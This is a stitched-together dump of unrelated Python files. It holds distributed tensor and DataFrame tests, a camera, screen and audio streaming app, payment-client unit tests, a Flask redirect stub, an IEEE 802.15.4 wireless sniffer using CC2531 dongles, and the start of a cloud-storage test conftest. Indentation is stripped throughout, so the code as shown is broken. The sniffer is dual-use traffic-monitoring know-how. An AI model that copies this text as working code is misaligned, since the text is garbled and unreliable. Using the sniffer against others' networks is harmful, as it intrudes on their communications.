arrs = mt.split(arr3, 3, axis=1)
result = arrs[0].to_numpy()
expected = np.split(data, 3, axis=1)[0]
np.testing.assert_array_equal(result, expected)
# test multiple outputs, but only execute 1
data = np.random.randint(0, 10, (5, 5))
arr3 = (mt.tensor(data) + 1) * 2
arrs = mt.linalg.qr(arr3)
result = (arrs[0] + 1).to_numpy()
expected = np.linalg.qr((data + 1) * 2)[0] + 1
np.testing.assert_array_almost_equal(result, expected)
result = (arrs[0] + 2).to_numpy()
expected = np.linalg.qr((data + 1) * 2)[0] + 2
np.testing.assert_array_almost_equal(result, expected)
s = mt.shape(0)
result = s.execute().fetch()
expected = np.shape(0)
assert result == expected
def test_closed_session():
from ..deploy.oscar.tests.session import new_test_session
session = new_test_session(default=True)
with option_context({'show_progress': False}):
arr = mt.ones((10, 10))
result = session.execute(arr)
np.testing.assert_array_equal(result, np.ones((10, 10)))
# close session
session.close()
with pytest.raises(RuntimeError):
session.execute(arr)
with pytest.raises(RuntimeError):
session.execute(arr + 1)
def test_array_protocol(setup):
arr = mt.ones((10, 20))
result = np.asarray(arr)
np.testing.assert_array_equal(result, np.ones((10, 20)))
arr2 = mt.ones((10, 20))
result = np.asarray(arr2, mt.bool_)
np.testing.assert_array_equal(result, np.ones((10, 20), dtype=np.bool_))
arr3 = mt.ones((10, 20)).sum()
result = np.asarray(arr3)
np.testing.assert_array_equal(result, np.asarray(200))
arr4 = mt.ones((10, 20)).sum()
result = np.asarray(arr4, dtype=np.float_)
np.testing.assert_array_equal(result, np.asarray(200, dtype=np.float_))
def test_without_fuse(setup):
arr1 = (mt.ones((10, 10), chunk_size=6) + 1) * 2
r1 = arr1.execute(fuse_enabled=False).fetch()
arr2 = (mt.ones((10, 10), chunk_size=5) + 1) * 2
r2 = arr2.execute(fuse_enabled=False).fetch()
np.testing.assert_array_equal(r1, r2)
def test_fetch_slices(setup):
arr1 = mt.random.rand(10, 8, chunk_size=3)
r1 = arr1.execute().fetch()
r2 = arr1[:2, 3:9].fetch()
np.testing.assert_array_equal(r2, r1[:2, 3:9])
r3 = arr1[0].fetch()
np.testing.assert_array_equal(r3, r1[0])
def test_fetch_dataframe_slices(setup):
arr1 = mt.random.rand(10, 8, chunk_size=3)
df1 = md.DataFrame(arr1)
r1 = df1.execute().fetch()
r2 = df1.iloc[:, :].fetch()
pd.testing.assert_frame_equal(r2, r1.iloc[:, :])
r3 = df1.iloc[1].fetch(extra_config={'check_series_name': False})
pd.testing.assert_series_equal(r3, r1.iloc[1])
r4 = df1.iloc[0, 2].fetch()
assert r4 == r1.iloc[0, 2]
arr2 = mt.random.rand(10, 3, chunk_size=3)
df2 = md.DataFrame(arr2)
r5 = df2.execute().fetch()
r6 = df2.iloc[:4].fetch(batch_size=3)
pd.testing.assert_frame_equal(r5.iloc[:4], r6)
def test_repr(setup):
# test tensor repr
with np.printoptions(threshold=100):
arr = np.random.randint(1000, size=(11, 4, 13))
t = mt.tensor(arr, chunk_size=3)
result = repr(t.execute())
expected = repr(arr)
assert result == expected
for size in (5, 58, 60, 62, 64):
pdf = pd.DataFrame(np.random.randint(1000, size=(size, 10)))
# test DataFrame repr
df = md.DataFrame(pdf, chunk_size=size//2)
result = repr(df.execute())
expected = repr(pdf)
assert result == expected
# test DataFrame _repr_html_
result = df.execute()._repr_html_()
expected = pdf._repr_html_()
assert result == expected
# test Series repr
ps = pdf[0]
s = md.Series(ps, chunk_size=size//2)
result = repr(s.execute())
expected = repr(ps)
assert result == expected
# test Index repr
pind = pd.date_range('2020-1-1', periods=10)
ind = md.Index(pind, chunk_size=5)
assert 'DatetimeIndex' in repr(ind.execute())
# test groupby repr
df = md.DataFrame(pd.DataFrame(np.random.rand(100, 3), columns=list('abc')))
grouped = df.groupby(['a', 'b']).execute()
assert 'DataFrameGroupBy' in repr(grouped)
# test Categorical repr
c = md.qcut(range(5), 3)
assert 'Categorical' in repr(c)
assert 'Categorical' in str(c)
assert repr(c.execute()) == repr(pd.qcut(range(5), 3))
def test_iter(setup):
raw_data = pd.DataFrame(np.random.randint(1000, size=(20, 10)))
df = md.DataFrame(raw_data, chunk_size=5)
for col, series in df.iteritems():
pd.testing.assert_series_equal(series.execute().fetch(), raw_data[col])
for i, batch in enumerate(df.iterbatch(batch_size=15)):
pd.testing.assert_frame_equal(batch, raw_data.iloc[i * 15: (i + 1) * 15])
i = 0
for result_row, expect_row in zip(df.iterrows(batch_size=15),
raw_data.iterrows()):
assert result_row[0] == expect_row[0]
pd.testing.assert_series_equal(result_row[1], expect_row[1])
i += 1
assert i == len(raw_data)
i = 0
for result_tup, expect_tup in zip(df.itertuples(batch_size=10),
raw_data.itertuples()):
assert result_tup == expect_tup
i += 1
assert i == len(raw_data)
raw_data = pd.Series(np.random.randint(1000, size=(20,)))
s = md.Series(raw_data, chunk_size=5)
for i, batch in enumerate(s.iterbatch(batch_size=15)):
pd.testing.assert_series_equal(batch, raw_data.iloc[i * 15: (i + 1) * 15])
i = 0
for result_item, expect_item in zip(s.iteritems(batch_size=15),
raw_data.iteritems()):
assert result_item[0] == expect_item[0]
assert result_item[1] == expect_item[1]
i += 1
assert i == len(raw_data)
# test to_dict
assert s.to_dict() == raw_data.to_dict()
CONFIG = """
inherits: '@default'
session:
custom_log_dir: '{custom_log_dir}'
"""
@pytest.fixture
def fetch_log_setup():
from ..deploy.oscar.tests.session import new_test_session
with tempfile.TemporaryDirectory() as temp_dir:
config = io.StringIO(CONFIG.format(custom_log_dir=temp_dir))
sess = new_test_session(default=True,
config=load_service_config_file(config),
n_cpu=8)
with option_context({'show_progress': False}):
try:
yield sess
finally:
sess.stop_server()
def test_fetch_log(fetch_log_setup):
def f():
print('test')
r = mr.spawn(f)
r.execute()
log = r.fetch_log()
assert str(log).strip() == 'test'
# test multiple functions
def f1(size):
print('f1' * size)
sys.stdout.flush()
fs = mr.ExecutableTuple([mr.spawn(f1, 30), mr.spawn(f1, 40)])
execute(*fs)
log = fetch_log(*fs, offsets=20, sizes=10)
assert str(log[0]).strip() == ('f1' * 30)[20:30]
assert str(log[1]).strip() == ('f1' * 40)[20:30]
assert len(log[0].offsets) > 0
assert all(s > 0 for s in log[0].offsets)
assert len(log[1].offsets) > 0
assert all(s > 0 for s in log[1].offsets)
assert len(log[0].chunk_op_keys) > 0
# test negative offsets
log = fs.fetch_log(offsets=-20, sizes=10)
assert str(log[0]).strip() == ('f1' * 30 + '\n')[-20:-10]
assert str(log[1]).strip() == ('f1' * 40 + '\n')[-20:-10]
assert all(s > 0 for s in log[0].offsets) is True
assert len(log[1].offsets) > 0
assert all(s > 0 for s in log[1].offsets) is True
assert len(log[0].chunk_op_keys) > 0
# test negative offsets which represented in string
log = fetch_log(*fs, offsets='-0.02K', sizes='0.01K')
assert str(log[0]).strip() == ('f1' * 30 + '\n')[-20:-10]
assert str(log[1]).strip() == ('f1' * 40 + '\n')[-20:-10]
assert all(s > 0 for s in log[0].offsets) is True
assert len(log[1].offsets) > 0
assert all(s > 0 for s in log[1].offsets) is True
assert len(log[0].chunk_op_keys) > 0
def test_nested():
print('level0')
fr = mr.spawn(f1, 1)
fr.execute()
print(fr.fetch_log())
r = mr.spawn(test_nested)
r.execute()
log = str(r.fetch_log())
assert 'level0' in log
assert 'f1' in log
df = md.DataFrame(mt.random.rand(10, 3), chunk_size=5)
def df_func(c):
print('df func')
return c
df2 = df.map_chunk(df_func)
df2.execute()
log = df2.fetch_log()
assert 'Chunk op key:' in str(log)
assert 'df func' in repr(log)
assert len(str(df.fetch_log())) == 0
def test_host(rndf):
rm = mr.spawn(nested, rndf)
rm.execute()
print(rm.fetch_log())
def nested(_rndf):
print('log_content')
ds = [mr.spawn(test_host, n, retry_when_fail=False)
for n in np.random.rand(4)]
xtp = execute(*ds)
for log in fetch_log(*xtp):
assert str(log).strip() == 'log_content'
def test_threaded():
import threading
exc_info = None
def print_fun():
nonlocal exc_info
try:
print('inner')
except: # noqa: E722 # nosec # pylint: disable=bare-except
exc_info = sys.exc_info()
print_thread = threading.Thread(target=print_fun)
print_thread.start()
print_thread.join()
if exc_info is not None:
raise exc_info[1].with_traceback(exc_info[-1])
print('after')
rm = mr.spawn(test_threaded)
rm.execute()
logs = str(rm.fetch_log()).strip()
assert logs == 'inner\nafter'
|
secondcam.py
|
import tkinter as tk
from tkinter import *
import socket
import threading
from vidstream import *
black = '#000000'
white = '#ffffff'
color = '#EFFBB1'
color1 = '#CBF0AA'
color2 = '#F0A9C0'
color3 = '#CD93CF'
color4 = '#D6F72D'
local_ip = socket.gethostbyname(socket.gethostname())
print(local_ip)
server = StreamingServer(local_ip, 7777)
receiver = AudioReceiver(local_ip, 6666)
class App:
def __init__(self):
def start_listening(self):
self.t1 = threading.Thread(target=server.start_server)
self.t2 = threading.Thread(target=receiver.start_server)
self.t1.start()
self.t2.start()
def start_camera_stream(self):
camera_client = CameraClient(self.text.get(1.0, 'end-1c'), 9999)
self.t3 = threading.Thread(target=camera_client.start_stream)
self.t3.start() ### done
def start_screen_sharing(self):
screen_sharing_client = ScreenShareClient(self.text.get(1.0, 'end-1c'), 9999)
self.t4 = threading.Thread(target=screen_sharing_client.start_stream)
self.t4.start() ### done
def start_audio_stream(self):
audio_sender = AudioSender(self.text.get(1.0, 'end-1c'), 8888)
self.t5 = threading.Thread(target=audio_sender.start_stream)
self.t5.start() ### done
def screen(self):
self.window = tk.Tk()
self.window.title('WebRTC Player')
self.window.geometry('300x300')
self.window.configure(bg=color)
def ip_adress(self):
label = Label(self.window, bg=color, text="Your friend's IP")
label.place(x=10, y=10)
self.text = Text(self.window, height=1, width=20)
self.text.place(x=10, y=30)
def buttons(self):
listen = Button(self.window, text='Start listening', command=lambda:start_listening(self))
listen.place(x=50, y=70)
camera = Button(self.window, text='Live camera', command=lambda:start_camera_stream(self))
camera.place(x=50, y=120)
share = Button(self.window, text='Share your screen', command=lambda:start_screen_sharing(self))
share.place(x=50, y=170)
audio = Button(self.window, text='Share your audio', command=lambda:start_audio_stream(self))
audio.place(x=50, y=220)
if self.window.protocol("WM_DELETE_WINDOW"):
server.stop_server()
receiver.stop_server()
screen(self)
ip_adress(self)
buttons(self)
self.window.mainloop()
app = App()
|
test_client.py
|
import unittest
from antchain_alipay_util.client import Client
from Tea.exceptions import TeaException
import threading
from http.server import HTTPServer, BaseHTTPRequestHandler
class Request(BaseHTTPRequestHandler):
def do_PUT(self):
body = self.rfile.read(int(self.headers['content-length']))
assert body == b'test python'
expected = self.headers['expected']
if expected == 'success':
self.send_response(200)
self.send_header('Content-type', 'application/xml')
self.end_headers()
self.wfile.write(b'''<?xml version="1.0" encoding="UTF-8"?>
<Error>
<Code>OK</Code>
</Error>''')
else:
self.send_response(400)
self.send_header('Content-type', 'application/xml')
self.end_headers()
self.wfile.write(b'''<?xml version="1.0" encoding="UTF-8"?>
<Error>
<Code>NoSuchKey</Code>
</Error>''')
def run_server():
server = HTTPServer(('localhost', 8888), Request)
server.serve_forever()
class TestClient(unittest.TestCase):
@classmethod
def setUpClass(cls):
server = threading.Thread(target=run_server)
        server.daemon = True
server.start()
def test_get_timestamp(self):
timestamp = Client.get_timestamp()
self.assertEqual(20, len(timestamp))
def test_has_error(self):
tmp = 'testInvalidJson'
resp = Client.has_error(tmp, 'secret', 'ok')
self.assertTrue(resp)
tmp = '{"noResponse":"true"}'
resp = Client.has_error(tmp, 'secret', 'ok')
self.assertTrue(resp)
tmp = '{"response":{"expired_time":"2021-01-04T17:04:42.072+08:00","file_id":"kjiac1a298f8d","req_msg_id":' \
'"79e093b3ae0f3f2c1","result_code":"false"},"sign":"IUl/4uLq7utFnsjF1Zy6B6OWbCg="}'
resp = Client.has_error(tmp, 'secret', 'ok')
self.assertTrue(resp)
tmp = '{"response":{"expired_time":"2021-01-04T17:04:42.072+08:00","file_id":"kjiac1a298f8d","req_msg_id":' \
'"79e093b3ae0f3f2c1","result_code":"OK"}}'
resp = Client.has_error(tmp, 'secret', 'success')
self.assertTrue(resp)
tmp = '{"response":{"expired_time":"2021-01-04T17:04:42.072+08:00","file_id":"kjiac1a298f8d","req_msg_id":' \
'"79e093b3ae0f3f2c1","result_code":"OK"},"sign":"IUl/4uLq7utFnsjF1Zy6B6OWbCg="}'
resp = Client.has_error(tmp, 'secret', 'ok')
self.assertFalse(resp)
tmp = '{"response":{"expired_time":"2021-01-04T17:04:42.072+08:00","file_id":"kjiac1a298f8d","req_msg_id":' \
'"79e093b3ae0f3f2c1","result_code":"OK"},"sign":"IUl/4uLqtFnsjF1Zy6B6OWbCg="}'
resp = Client.has_error(tmp, 'secret', 'ok')
self.assertTrue(resp)
def test_get_signature(self):
params = {
'test': 'ok'
}
signature = Client.get_signature(params, 'secret')
self.assertEqual('qlB4B1lFcehlWRelL7Fo4uNHPCs=', signature)
def test_get_nonce(self):
self.assertEqual(32, len(Client.get_nonce()))
def test_parse_upload_headers(self):
res = Client.parse_upload_headers(12)
self.assertEqual({}, res)
res = Client.parse_upload_headers('{"test":"ok"}')
self.assertEqual({}, res)
res = Client.parse_upload_headers([
{
"name": "content-type",
"value": "text",
},
{
"name": "content-md5",
"value": "md5value",
},
])
self.assertEqual('text', res['content-type'])
self.assertEqual('md5value', res['content-md5'])
def test_put_object(self):
url = 'http://127.0.0.1:8888'
with open('test.txt', 'rb') as f:
Client.put_object(f, {'expected': 'success'}, url)
with open('test.txt', 'rb') as f:
try:
Client.put_object(f, {'expected': 'fail'}, url)
assert False
except TeaException as e:
self.assertEqual('NoSuchKey', e.code)
self.assertEqual(400, e.data['httpCode'])
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def main():
return '<meta http-equiv="refresh" content="0; URL=https://darkshadoow159258.github.io"/>'
def run():
app.run(host="0.0.0.0", port=8080)
def keep_alive():
server = Thread(target=run)
server.start()
|
sniffer.py
|
# -*- coding: UTF-8 -*-
#/**
# * Software name: CC2531
# * Version: 0.1.0
# * Library to drive TI CC2531 802.15.4 dongle to monitor channels
# * Copyright (C) 2013 Benoit Michau, ANSSI.
# *
# * This program is free software; you can redistribute it and/or modify
# * it under the terms of the CeCILL-B license as published here:
# * http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html
# *
# *--------------------------------------------------------
# * File Name : sniffer.py
# * Created : 2013-11-13
# * Authors : Benoit Michau, ANSSI
# *--------------------------------------------------------
# */
#!/usr/bin/python2
#
###
# 802.15.4 monitor based on Texas Instruments CC2531 USB dongle
#
# uses libusb1
# http://www.libusb.org/
# and python-libusb1
# https://github.com/vpelletier/python-libusb1/
###
#
#
# This is the main executable program
#
# dataflow:
# TI CC2531 dongle --(libusb1/python_libusb1)--> CC2531() --> receiver() -- (socket) --> interpreter()
#
# CC2531.py is the USB driver for the dongle
# receiver.py is the handler to receive 802.15.4 frame and forward them over the socket
# interpreter.py is the socket server and prints interpreted information
#
###
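#
# Editor's sketch (not part of the original tool): the forwarded frames use the
# simple TLV layout described in prolog()'s help text (Tag: uint8, Length: uint8,
# Value: char*[L]). Assuming that layout, a consumer on the UDP/2154 side could
# walk one received datagram roughly as follows; the function name is hypothetical
# and nothing in sniffer.py calls it.
def _example_parse_tlv(buf):
    # buf: one forwarded frame as raw bytes / str
    buf = bytearray(buf)
    fields = []
    i = 0
    while i + 2 <= len(buf):
        tag, length = buf[i], buf[i + 1]
        # slicing truncates gracefully if the advertised length overruns the buffer
        value = bytes(buf[i + 2:i + 2 + length])
        fields.append((tag, value))
        i += 2 + length
    return fields
#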
import os
import socket
import signal
import argparse
from time import time, sleep
from binascii import hexlify, unhexlify
from threading import Thread, Event
from CC2531 import *
from receiver import *
from interpreter import *
from gps import *
def LOG(msg=''):
print('[sniffer] %s' % msg)
###
# Dummy servers for testing purpose
###
def create_file_serv(addr):
# Make sure the socket does not already exist
try:
os.unlink(addr)
except OSError:
if os.path.exists(addr):
raise(Exception('cannot clean %s' % addr))
# serv on file
sk = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
try:
sk.bind(addr)
except socket.error:
        raise(Exception('cannot bind on %s' % addr))
return sk
def create_udp_serv(addr):
# serv on UDP port
sk = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
sk.bind(addr)
except socket.error:
raise(Exception('cannot bind on UDP port %s' % list(addr)))
return sk
def test_receiver(x=0):
cc = CC2531(get_CC2531()[x])
receiver.DEBUG = 1
receiver.SOCK_ADDR = ('localhost', 2154)
receiver.CHAN_LIST = [0x0f, 0x14, 0x19]
receiver.CHAN_PERIOD = 10
serv = create_udp_serv(receiver.SOCK_ADDR)
s = receiver(cc)
s.listen()
###
# Multi-receiver for multi-threaded execution
###
def threadit(task, *args, **kwargs):
th = Thread(target=task, args=args, kwargs=kwargs)
th.daemon = True
th.start()
return th
def prepare_receiver(chans=[0x0f, 0x14, 0x19]):
    ccs = list(map(CC2531, get_CC2531()))
#
if len(ccs) == 0:
LOG(' no CC2531 dongles found')
return []
#
# split the chans' list into separate lists for all receivers
e, r = len(chans)//len(ccs), len(chans)%len(ccs)
cl = []
start, stop = 0, 0
for i in range(len(ccs)):
if stop > 0:
start = stop
if i < r:
stop = start + e + 1
else:
stop = start + e
cl.append(chans[start:stop])
#
ss = [receiver(cc) for cc in ccs]
for i in range(len(cl)):
# configure channels' list of each CC2531 receiver
ss[i].CHAN_LIST = cl[i]
#
return ss
###
# Main program
###
def prolog():
# command line handler
parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,
description='Use TI CC2531 dongles to sniff on IEEE 802.15.4 channels.\n'\
'Forward all sniffed frames over the network (UDP/2154 port).\n'\
'Each frame is packed with a list of TLV fields:\n'\
'\tTag : uint8, Length : uint8, Value : char*[L]\n'\
'\tT=0x01, 802.15.4 channel, uint8\n'
'\tT=0x02, epoch time at frame reception, ascii encoded\n'
'\tT=0x03, position at frame reception (if positionning server available)\n'
'\tT=0x10, 802.15.4 frame within TI PSD structure\n'
'\tT=0x20, 802.15.4 frame\n'\
'Output 802.15.4 frame information (channel, RSSI, MAC header, ...)')
#
parser.add_argument('-d', '--debug', type=int, default=0,
help='debug level (0: silent, 3: very verbose)')
parser.add_argument('-c', '--chans', nargs='*', type=int, default=range(11,27),
help='list of IEEE 802.15.4 channels to sniff on (between 11 and 26)')
parser.add_argument('-p', '--period', type=float, default=1.0,
help='time (in seconds) to sniff on a single channel before hopping')
parser.add_argument('-n', '--nofcschk', action='store_true', default=False,
help='displays all sniffed frames, even those with failed FCS check')
parser.add_argument('--gps', type=str, default='/dev/ttyUSB0',
help='serial port to get NMEA information from GPS')
parser.add_argument('--ip', type=str, default='localhost',
help='network destination for forwarding 802.15.4 frames')
parser.add_argument('--filesock', action='store_true', default=False,
help='forward 802.15.4 frames to a UNIX file socket /tmp/cc2531_server '\
'instead of the UDP socket')
parser.add_argument('-f', '--file', action='store_true', default=False,
help='output (append) frame information to file /tmp/cc2531_sniffer')
parser.add_argument('-s', '--silent', action='store_true', default=False,
help='do not print frame information on stdout')
#
args = parser.parse_args()
#
if args.debug:
LOG(' command line arguments:\n%s' % repr(args))
CC2531.DEBUG = max(0, args.debug-2)
GPS_reader.DEBUG = max(0, args.debug-2)
receiver.DEBUG = max(0, args.debug-1)
interpreter.DEBUG = args.debug
#
receiver.CHAN_PERIOD = args.period
if args.filesock:
receiver.SOCK_ADDR = '/tmp/cc2531_server'
else:
receiver.SOCK_ADDR = (args.ip, 2154)
if os.path.exists(args.gps):
GPS_reader.PORT = args.gps
#
chans = [c for c in args.chans if 11 <= c <= 26]
if chans == []:
chans = CHANNELS.keys()
#
interpreter.SOCK_ADDR = receiver.SOCK_ADDR
if args.file:
interpreter.OUTPUT_FILE = '/tmp/cc2531_sniffer'
else:
interpreter.OUTPUT_FILE = None
interpreter.OUTPUT_STDOUT = not args.silent
#
interpreter.FCS_IGNORE = args.nofcschk
#
return chans
def main():
#
global running
running = False
#
chans = prolog()
#
# init threads' list and CTRL+C handler
# threaded parts are not getting signals:
# -> all threads are daemonized
# -> the stop_event Event() signals each thread to stop listening over USB
threads = []
stop_event = Event()
interpreter._THREADED = True
interpreter._STOP_EVENT = stop_event
GPS_reader._THREADED = True
GPS_reader._STOP_EVENT = stop_event
receiver._THREADED = True
receiver._STOP_EVENT = stop_event
#
def int_handler(signum, frame):
print('SIGINT: quitting')
stop_event.set()
#for c, t in threads:
# print('stopping thread: %s' % repr(t))
global running
running = False
signal.signal(signal.SIGINT, int_handler)
#
running = True
# start interpreter (/server)
interp = interpreter()
threads.append( (interp, threadit(interp.process)) )
#
# start gps reader
gps = GPS_reader()
receiver.GPS = gps
threads.append( (gps, threadit(gps.listen)) )
#
# start CC2531 receivers
ccs = prepare_receiver(chans)
for cc in ccs:
threads.append( (cc, threadit(cc.listen)) )
#
# loop infinitely until SIGINT is caught
# this loop lets all daemonized threads running
while running:
sleep(1)
#
# finally, wait for each thread to stop properly after they received
# the stop_event signal
for c, t in threads:
t.join()
if __name__ == '__main__':
main()
|
conftest.py
|
import logging
import os
import random
import time
import tempfile
import threading
from concurrent.futures.thread import ThreadPoolExecutor
from datetime import datetime
from math import floor
from shutil import copyfile
from functools import partial
from botocore.exceptions import ClientError
import pytest
from collections import namedtuple
from ocs_ci.deployment import factory as dep_factory
from ocs_ci.framework import config
from ocs_ci.framework.pytest_customization.marks import (
deployment,
ignore_leftovers,
tier_marks,
ignore_leftover_label,
)
from ocs_ci.ocs import constants, defaults, fio_artefacts, node, ocp, platform_nodes
from ocs_ci.ocs.bucket_utils import craft_s3_command
from ocs_ci.ocs.exceptions import (
CommandFailed,
TimeoutExpiredError,
CephHealthException,
ResourceWrongStatusException,
UnsupportedPlatformError,
PoolDidNotReachReadyState,
StorageclassNotCreated,
PoolNotDeletedFromUI,
StorageClassNotDeletedFromUI,
)
from ocs_ci.ocs.mcg_workload import mcg_job_factory as mcg_job_factory_implementation
from ocs_ci.ocs.node import get_node_objs, schedule_nodes
from ocs_ci.ocs.ocp import OCP
from ocs_ci.ocs.resources import pvc
from ocs_ci.ocs.utils import setup_ceph_toolbox, collect_ocs_logs
from ocs_ci.ocs.resources.backingstore import (
backingstore_factory as backingstore_factory_implementation,
)
from ocs_ci.ocs.resources.namespacestore import (
namespace_store_factory as namespacestore_factory_implementation,
)
from ocs_ci.ocs.resources.bucketclass import (
bucket_class_factory as bucketclass_factory_implementation,
)
from ocs_ci.ocs.resources.cloud_manager import CloudManager
from ocs_ci.ocs.resources.cloud_uls import (
cloud_uls_factory as cloud_uls_factory_implementation,
)
from ocs_ci.ocs.node import check_nodes_specs
from ocs_ci.ocs.resources.mcg import MCG
from ocs_ci.ocs.resources.objectbucket import BUCKET_MAP
from ocs_ci.ocs.resources.ocs import OCS
from ocs_ci.ocs.resources.pod import (
get_rgw_pods,
delete_deploymentconfig_pods,
get_pods_having_label,
get_deployments_having_label,
Pod,
)
from ocs_ci.ocs.resources.pvc import PVC, create_restore_pvc
from ocs_ci.ocs.version import get_ocs_version, report_ocs_version
from ocs_ci.ocs.cluster_load import ClusterLoad, wrap_msg
from ocs_ci.utility import (
aws,
deployment_openshift_logging as ocp_logging_obj,
ibmcloud,
kms as KMS,
reporting,
templating,
users,
)
from ocs_ci.utility.environment_check import (
get_status_before_execution,
get_status_after_execution,
)
from ocs_ci.utility.flexy import load_cluster_info
from ocs_ci.utility.kms import is_kms_enabled
from ocs_ci.utility.prometheus import PrometheusAPI
from ocs_ci.utility.uninstall_openshift_logging import uninstall_cluster_logging
from ocs_ci.utility.utils import (
ceph_health_check,
ceph_health_check_base,
get_running_ocp_version,
get_openshift_client,
get_system_architecture,
get_testrun_name,
load_auth_config,
ocsci_log_path,
skipif_ocp_version,
skipif_ocs_version,
TimeoutSampler,
skipif_upgraded_from,
update_container_with_mirrored_image,
skipif_ui_not_support,
)
from ocs_ci.helpers import helpers
from ocs_ci.helpers.helpers import (
create_unique_resource_name,
create_ocs_object_from_kind_and_name,
setup_pod_directories,
get_current_test_name,
)
from ocs_ci.ocs.bucket_utils import get_rgw_restart_counts
from ocs_ci.ocs.pgsql import Postgresql
from ocs_ci.ocs.resources.rgw import RGW
from ocs_ci.ocs.jenkins import Jenkins
from ocs_ci.ocs.couchbase import CouchBase
from ocs_ci.ocs.amq import AMQ
from ocs_ci.ocs.elasticsearch import ElasticSearch
from ocs_ci.ocs.ui.base_ui import login_ui, close_browser
from ocs_ci.ocs.ripsaw import RipSaw
from ocs_ci.ocs.ui.block_pool import BlockPoolUI
from ocs_ci.ocs.ui.storageclass import StorageClassUI
log = logging.getLogger(__name__)
class OCSLogFormatter(logging.Formatter):
def __init__(self):
fmt = (
"%(asctime)s - %(threadName)s - %(levelname)s - %(name)s.%(funcName)s.%(lineno)d "
"- %(message)s"
)
super(OCSLogFormatter, self).__init__(fmt)
def pytest_logger_config(logger_config):
logger_config.add_loggers([""], stdout_level="info")
logger_config.set_log_option_default("")
logger_config.split_by_outcome()
logger_config.set_formatter_class(OCSLogFormatter)
def pytest_collection_modifyitems(session, items):
"""
A pytest hook to filter out skipped tests satisfying
skipif_ocs_version, skipif_upgraded_from or skipif_no_kms
Args:
session: pytest session
items: list of collected tests
"""
teardown = config.RUN["cli_params"].get("teardown")
deploy = config.RUN["cli_params"].get("deploy")
skip_ocs_deployment = config.ENV_DATA["skip_ocs_deployment"]
# Add squad markers to each test item based on filepath
for item in items:
for squad, paths in constants.SQUADS.items():
for _path in paths:
# Limit the test_path to the tests directory
test_path = os.path.relpath(item.fspath.strpath, constants.TOP_DIR)
if _path in test_path:
item.add_marker(f"{squad.lower()}_squad")
item.user_properties.append(("squad", squad))
break
if not (teardown or deploy or skip_ocs_deployment):
for item in items[:]:
skipif_ocp_version_marker = item.get_closest_marker("skipif_ocp_version")
skipif_ocs_version_marker = item.get_closest_marker("skipif_ocs_version")
skipif_upgraded_from_marker = item.get_closest_marker(
"skipif_upgraded_from"
)
skipif_no_kms_marker = item.get_closest_marker("skipif_no_kms")
skipif_ui_not_support_marker = item.get_closest_marker(
"skipif_ui_not_support"
)
if skipif_ocp_version_marker:
skip_condition = skipif_ocp_version_marker.args
# skip_condition will be a tuple
# and condition will be first element in the tuple
if skipif_ocp_version(skip_condition[0]):
log.info(
f"Test: {item} will be skipped due to OCP {skip_condition}"
)
items.remove(item)
continue
if skipif_ocs_version_marker:
skip_condition = skipif_ocs_version_marker.args
# skip_condition will be a tuple
# and condition will be first element in the tuple
if skipif_ocs_version(skip_condition[0]):
log.info(f"Test: {item} will be skipped due to {skip_condition}")
items.remove(item)
continue
if skipif_upgraded_from_marker:
skip_args = skipif_upgraded_from_marker.args
if skipif_upgraded_from(skip_args[0]):
log.info(
f"Test: {item} will be skipped because the OCS cluster is"
f" upgraded from one of these versions: {skip_args[0]}"
)
items.remove(item)
if skipif_no_kms_marker:
try:
if not is_kms_enabled():
log.info(
f"Test: {item} it will be skipped because the OCS cluster"
f" has not configured cluster-wide encryption with KMS"
)
items.remove(item)
except KeyError:
log.warning(
"Cluster is not yet installed. Skipping skipif_no_kms check."
)
if skipif_ui_not_support_marker:
skip_condition = skipif_ui_not_support_marker
if skipif_ui_not_support(skip_condition.args[0]):
log.info(
f"Test: {item} will be skipped due to UI test {skip_condition.args} is not available"
)
items.remove(item)
continue
# skip UI test on openshift dedicated ODF-MS platform
if (
config.ENV_DATA["platform"].lower() == constants.OPENSHIFT_DEDICATED_PLATFORM
or config.ENV_DATA["platform"].lower() == constants.ROSA_PLATFORM
):
for item in items.copy():
if "/ui/" in str(item.fspath):
log.info(
f"Test {item} is removed from the collected items"
f" UI is not supported on {config.ENV_DATA['platform'].lower()}"
)
items.remove(item)
@pytest.fixture()
def supported_configuration():
"""
Check that cluster nodes have enough CPU and Memory as described in:
https://access.redhat.com/documentation/en-us/red_hat_openshift_container_storage/4.2/html-single/planning_your_deployment/index#infrastructure-requirements_rhocs
This fixture is intended as a prerequisite for tests or fixtures that
run flaky on configurations that don't meet minimal requirements.
Minimum requirements for each starting node (OSD+MON):
16 CPUs
64 GB memory
Last documentation check: 2020-02-21
"""
min_cpu = constants.MIN_NODE_CPU
min_memory = constants.MIN_NODE_MEMORY
log.info("Checking if system meets minimal requirements")
if not check_nodes_specs(min_memory=min_memory, min_cpu=min_cpu):
err_msg = (
f"At least one of the worker nodes doesn't meet the "
f"required minimum specs of {min_cpu} vCPUs and {min_memory} RAM"
)
pytest.xfail(err_msg)
@pytest.fixture(scope="session", autouse=True)
def auto_load_auth_config():
try:
auth_config = {"AUTH": load_auth_config()}
config.update(auth_config)
except FileNotFoundError:
pass # If auth file doesn't exist we just ignore.
@pytest.fixture(scope="class")
def secret_factory_class(request):
return secret_factory_fixture(request)
@pytest.fixture(scope="session")
def secret_factory_session(request):
return secret_factory_fixture(request)
@pytest.fixture(scope="function")
def secret_factory(request):
return secret_factory_fixture(request)
def secret_factory_fixture(request):
"""
Secret factory. Calling this fixture creates a new secret.
RBD based is default.
** This method should not be used anymore **
** This method is for internal testing only **
"""
instances = []
def factory(interface=constants.CEPHBLOCKPOOL):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
"""
secret_obj = helpers.create_secret(interface_type=interface)
assert secret_obj, "Failed to create a secret"
instances.append(secret_obj)
return secret_obj
def finalizer():
"""
Delete the RBD secrets
"""
for instance in instances:
instance.delete()
instance.ocp.wait_for_delete(instance.name)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="session", autouse=True)
def log_ocs_version(cluster):
"""
Fixture handling version reporting for OCS.
This fixture handles alignment of the version reporting, so that we:
* report version for each test run (no matter if just deployment, just
test or both deployment and tests are executed)
* prevent conflict of version reporting with deployment/teardown (eg. we
should not run the version logging before actual deployment, or after
a teardown)
Version is reported in:
